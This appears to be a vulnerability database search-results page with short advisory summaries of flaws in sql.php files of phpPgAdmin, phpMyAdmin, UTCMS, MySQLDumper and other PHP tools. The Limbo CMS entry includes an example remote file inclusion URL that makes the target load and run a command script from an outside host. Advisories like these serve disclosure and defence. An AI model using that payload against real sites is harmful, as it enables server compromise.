32 matches found
GHSA-R63P-V37Q-G74C phppgadmin contains an incorrect access control vulnerability
phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters 'subject', 'server', 'database', 'queryid' without proper validation or access...
phpPgAdmin security vulnerability
phpPgAdmin is an open source application from the phppgadmin project, the premier web-based administration tool for PostgreSQL. A security vulnerability exists in phpPgAdmin 7.13.0 and prior versions, which stems from a lack of proper authentication or access control checks in sql.php and could lead to session...
CVE-2025-60799
phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters 'subject', 'server', 'database', 'queryid' without proper validation or access...
EUVD-2001-0475
Malware in sbrugna...
EUVD-2006-5249
Malware in sbrugna...
EUVD-2001-0474
Malware in sbrugna...
CVE-2024-9918
A vulnerability has been found in HuangDou UTCMS V9 and classified as critical. This vulnerability affects the function RunSql of the file app/modules/ut-data/admin/sql.php. The manipulation of the argument sql leads to sql injection. The attack can be initiated remotely. The exploit has been...
CVE-2024-9918 HuangDou UTCMS sql.php RunSql sql injection
A vulnerability has been found in HuangDou UTCMS V9 and classified as critical. This vulnerability affects the function RunSql of the file app/modules/ut-data/admin/sql.php. The manipulation of the argument sql leads to sql injection. The attack can be initiated remotely. The exploit has been...
SQL Injection
pimcore/pimcore is vulnerable to SQL Injection. The vulnerability exists in Sql.php because the custom report filters are not properly optimized, which allows an attacker to inject and execute malicious SQL queries...
SUSE CVE-2006-1803
Cross-site scripting (XSS) vulnerability in sql.php in phpMyAdmin 2.7.0-pl1 allows remote attackers to inject arbitrary web script or HTML via the sqlquery parameter...
CVE-2018-10188
phpMyAdmin 4.8.0 before 4.8.0-1 has CSRF, allowing an attacker to execute arbitrary SQL statements, related to js/dboperations.js, js/tbloperations.js, libraries/classes/Operations.php, and sql.php...
MySQLDumper 1.21 SQL.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20460/info MySQLDumper is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to execute attacker-supplied script code ...
Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability
Vulnerability type: input validation error. Affected versions: Limbo CMS 1.0.4.2, Limbo CMS 1.0.4.1. Cause: user input is not filtered, which allows an attacker to execute remote PHP files and thereby threaten the website or even the server. exp: http://www.example.com/classes/adodbt/sql.php?classesdir=http://www.example2.com/cmd.gif?cmd=ls Reference: http://www.securityfocus.com/bid/17760/info Title: Limbo CMS = 1.04...
CVE-2012-4251
The CVE-2012-4251 entry corresponds to multiple XSS vulnerabilities in MySQLDumper 1.24.4. Reported affected vectors include index.php (page param), install.php (phase param), sql.php (tablename or dbid params), and restore.php (filename param) within learn/cubemail/. The connected sources confir...
CVE-2011-2643
Directory traversal vulnerability in sql.php in phpMyAdmin 3.4.x before 3.4.3.2, when configuration storage is enabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a MIME-type transformation parameter...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.10.3 allow remote attackers to inject arbitrary web script or HTML via the (1) unlimnumrows, (2) sqlquery, or (3) pos parameter to (a) tblexport.php; the (4) sessionmaxrows or (5) pos parameter to (b) sql.php; the (6) username parameter to (c)...
Madirish Webmail 2.0 - addressbook.php Remote File Inclusion
Madirish Webmail v2.0 Remote File Include Vulnerabilities. Author: BoZKuRTSeRDaR. Contact MSN: [email protected]. My Homepage: WwW.Turkmilliyetcileri.OrG. Script Download: http://sourceforge.net/projects/madirishwebmail code:...
CVE-2006-6942
Multiple cross-site scripting (XSS) vulnerabilities in PhpMyAdmin before 2.9.1.1 allow remote attackers to inject arbitrary HTML or web script via (1) a comment for a table name, as exploited through (a) dboperations.php, (2) the db parameter to (b) dbcreate.php, (3) the newname parameter to dboperations.php...